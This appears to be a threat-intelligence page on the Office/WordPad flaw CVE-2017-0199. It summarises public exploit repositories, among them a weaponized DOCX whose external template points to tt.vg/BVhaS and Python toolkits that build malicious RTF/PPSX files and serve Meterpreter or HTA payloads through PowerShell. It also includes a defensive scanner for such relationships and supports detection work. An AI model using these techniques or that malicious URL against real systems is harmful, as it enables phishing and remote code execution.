Microsoft Office/WordPad Remote Code Execution Vulnerability
CVE-2017-0199 is a remote code execution vulnerability affecting Microsoft Office 2007 SP3, Office 2010 SP2, Office 2013 SP1, Office 2016, and supported Windows components including WordPad on Windows Vista SP2, Windows Server 2008 SP2, Windows 7 SP1, and Windows 8.1. The vulnerability is triggered when a user opens or otherwise renders a crafted Office or RTF document that abuses OLE/remote template handling to retrieve attacker-controlled content from an external source. Multiple reports describe malicious DOCX/RTF documents using an OLE object or remote template injection to fetch a remote RTF or template, which can then execute script or follow-on exploit content, including Visual Basic script with PowerShell commands. The issue was widely weaponized in phishing campaigns and commonly used as an initial access vector to deliver malware such as Dridex, FINSPY, LATENTBOT, Agent Tesla, Ande Loader, SmokeLoader, and SideWinder payloads.
Exploits
6 valid exploits after Mallory filtered fakes, detection scripts, and README-only repos (8 hidden).
Repository contains a single malicious Microsoft Word DOCX sample (OpenXML structure) and a blue-team writeup. The exploit targets CVE-2017-0199 (Office/Word remote code execution via external template/HTA retrieval). The key exploit primitive is in word/_rels/settings.xml.rels: an attachedTemplate relationship with TargetMode="External" pointing to tt.vg at path /BVhaS (formatted as http://<username>@tt.vg/BVhaS). When opened, Word (WINWORD.EXE) attempts HTTP/HTTPS requests (GET/HEAD /BVhaS, OPTIONS /) to tt.vg; the README reports 404 responses in the sandbox run, implying the second-stage payload was unavailable at detonation time.
Structure/purpose:
- README.md: detailed sandbox detonation report (ANY.RUN) including attack chain narrative, network IOCs (tt.vg, /BVhaS, resolved IPs), and forensic artifacts (temp files, Content.MSO EMF cache) plus registry access notes and hunting query examples.
- OpenXML parts: [Content_Types].xml, docProps/*, word/document.xml, word/settings.xml, and relationship files. The relationships show embedded OLE objects (AcroExch.Document.DC) and the external attachedTemplate pointer that drives the CVE-2017-0199 behavior.
Overall, this is not a traditional exploit codebase but a weaponized document sample plus analysis. It provides a reproducible indicator set (domain/URL/IPs and artifact locations) and demonstrates how the DOCX is wired to trigger outbound retrieval that can lead to RCE on vulnerable Office installations.
Repository contains a malicious Microsoft Word DOCX sample (OpenXML structure) and a blue-team oriented writeup. The exploit targets CVE-2017-0199 (Office/Word remote code execution via external template/HTA retrieval).
Structure/purpose:
- README.md: Detailed ANY.RUN sandbox detonation report, attack chain narrative, and IOCs (domain tt.vg, URLs /BVhaS, resolved IPs). Describes Word making GET/HEAD requests and dropping temp/cache artifacts; includes example hunting query.
- OpenXML parts (e.g., word/document.xml, word/settings.xml, relationships): The actual weaponized document internals.
Key exploit mechanism (in-document):
- word/_rels/settings.xml.rels defines an External attachedTemplate relationship: Target="http://ballontechnologytoupdatethenewthingstodeliveredeverywhere@tt.vg/BVhaS" with TargetMode="External". This is the critical indicator of the CVE-2017-0199-style behavior: when the document is opened, Word attempts to fetch remote content from tt.vg.
Additional embedded content:
- word/document.xml references multiple embedded OLE objects with ProgID "AcroExch.Document.DC" (PDF/Acrobat OLE embeddings). These appear to be decoy/embedded objects; the primary exploit trigger is the external template relationship.
Observed capability/outcome:
- Network beaconing to tt.vg over HTTP/HTTPS attempting to retrieve /BVhaS. The README indicates the server returned HTTP 404 in the detonation, so no second-stage payload was obtained in that run; nonetheless, the document is constructed to pull attacker-controlled remote content, which is the core exploitation capability.
This repository contains a real-world malicious DOCX file ('BankPaymAdviceVend.Report.docx') that exploits CVE-2017-0199, a remote code execution vulnerability in Microsoft Word (versions 2007–2016). The exploit is triggered when a user opens the document, causing Word to fetch and attempt to execute a remote HTA payload from the attacker-controlled domain 'tt.vg' (e.g., http://tt.vg/BVhaS). The repository provides a comprehensive blue-team analysis, including network indicators (domain, URLs, IPs), dropped files (such as EMF images in the browser cache and .tmp files), and registry keys accessed during exploitation. The structure consists of the malicious DOCX and its internal Office XML components, with the main exploit vector being an external template reference in 'word/_rels/settings.xml.rels' pointing to the attacker's server. The README.md offers detailed behavioral analysis, IOCs, and detection guidance, making this repository valuable for defenders seeking to understand and detect this exploit in enterprise environments.
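The three summaries above all point at the same in-document indicator: an attachedTemplate (or oleObject) relationship in a .rels part with TargetMode="External", with a "user@" prefix in the URL masking the real host. The scanner below is an added defender-side example, not code from the analysed repository; it builds a constructed minimal DOCX that mimics that settings.xml.rels (placeholder host remote-host.invalid, not the sample's real target) and shows how to pull the true hostname out for triage.

```python
"""Flag External attachedTemplate/oleObject relationships in a DOCX package (added example)."""
import io
import zipfile
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
TEMPLATE_TYPE = ("http://schemas.openxmlformats.org/officeDocument/2006/"
                 "relationships/attachedTemplate")
SUSPICIOUS_TYPES = ("attachedTemplate", "oleObject")


def external_rels(docx_bytes):
    """Return (part, relationship type, raw target, real host) for every
    External relationship of a suspicious type in any .rels part."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for name in zf.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(zf.read(name))
            for rel in root.iter(f"{{{REL_NS}}}Relationship"):
                if rel.get("TargetMode") != "External":
                    continue
                rtype = rel.get("Type", "").rsplit("/", 1)[-1]
                if rtype not in SUSPICIOUS_TYPES:
                    continue
                target = rel.get("Target", "")
                # .hostname discards the "decoy-name@" userinfo used to disguise the host
                host = urlsplit(target).hostname or ""
                findings.append((name, rtype, target, host))
    return findings


def build_sample(with_external_template=True):
    """Constructed minimal DOCX (not the real sample) with or without the indicator."""
    rel = (f'<Relationship Id="rId1" Type="{TEMPLATE_TYPE}" '
           f'Target="http://decoy-name@remote-host.invalid/stage2" TargetMode="External"/>'
           if with_external_template else "")
    rels = f'<?xml version="1.0" encoding="UTF-8"?><Relationships xmlns="{REL_NS}">{rel}</Relationships>'
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", "<document/>")
        zf.writestr("word/_rels/settings.xml.rels", rels)
    return buf.getvalue()


if __name__ == "__main__":
    for finding in external_rels(build_sample()):
        print("suspicious external relationship:", finding)
```

On a real file, pass the bytes of the DOCX to external_rels and treat any returned host as a hunting pivot for proxy and DNS logs.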
This repository contains a Python 2 script (htattack.py) that implements an exploit for CVE-2017-0199, a remote code execution vulnerability in Microsoft Office's handling of RTF documents. The script acts as a malicious HTTP server that serves a payload (such as a Meterpreter shell) to victims who open a specially crafted RTF file. When the victim's Office application requests the payload, the server responds with either the executable or an HTML Application (HTA) script that uses PowerShell to download and execute the payload on the victim's Windows system. The repository includes a README with usage instructions and a reference to a demonstration video. The main exploit logic is contained in htattack.py, which handles incoming HTTP requests and serves the appropriate malicious content. The exploit requires the attacker to host the payload and run the script, and the victim must open a malicious RTF document that triggers the exploit. The attack vector is network-based, leveraging HTTP to deliver the payload. Several fingerprintable endpoints are present, including the attacker's payload URL, local file paths on both the attacker's and victim's systems, and the use of PowerShell for execution.
This repository provides a Python-based exploit toolkit for CVE-2017-0199, a remote code execution vulnerability in Microsoft Office. The main script, 'cve-2017-0199_toolkit.py', allows users to generate malicious RTF or PPSX files that, when opened by a vulnerable Office installation, will fetch and execute attacker-specified payloads. The toolkit supports both local and remote payload delivery, including EXE files (such as Meterpreter shells), HTA/SCT scripts, or custom files. The script can also serve payloads over HTTP, acting as a simple web server. The README provides detailed usage scenarios and command-line options, demonstrating how to generate malicious documents and deliver payloads. The exploit is operational and can be used to achieve remote code execution on unpatched Microsoft Office installations. The repository contains three files: a detailed README, a TODO list, and the main exploit script written in Python.
This repository contains a Python 3 script ('cve-2017-0199_toolkit_3.py') that implements an exploit for CVE-2017-0199, a remote code execution vulnerability in Microsoft Office. The toolkit can generate malicious RTF or PPSX files that, when opened by a vulnerable Office installation, cause the application to fetch and execute a remote payload (such as a Meterpreter shell or custom executable) via a crafted HTA or SCT file. The script supports two main modes: 'gen' (generation of malicious files) and 'exp' (exploitation/delivery of payloads). It allows the attacker to specify URLs or local paths for payloads and HTA/SCT files, and can obfuscate the generated RTF files. The exploit works by running a local HTTP server to deliver the malicious content and payloads to the victim. The README provides a brief overview and notes that the script has been updated for Python 3 compatibility. The repository is operational and suitable for penetration testing or red teaming against unpatched Microsoft Office installations.
Recent activity
69 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
Legacy Microsoft Office flaw still actively exploited in 2025 campaigns.
A Microsoft Office and WordPad vulnerability that can let an attacker take control of the system.
An RTF-based exploit chain referenced as part of a prior SideWinder investigation, not the primary campaign in this report.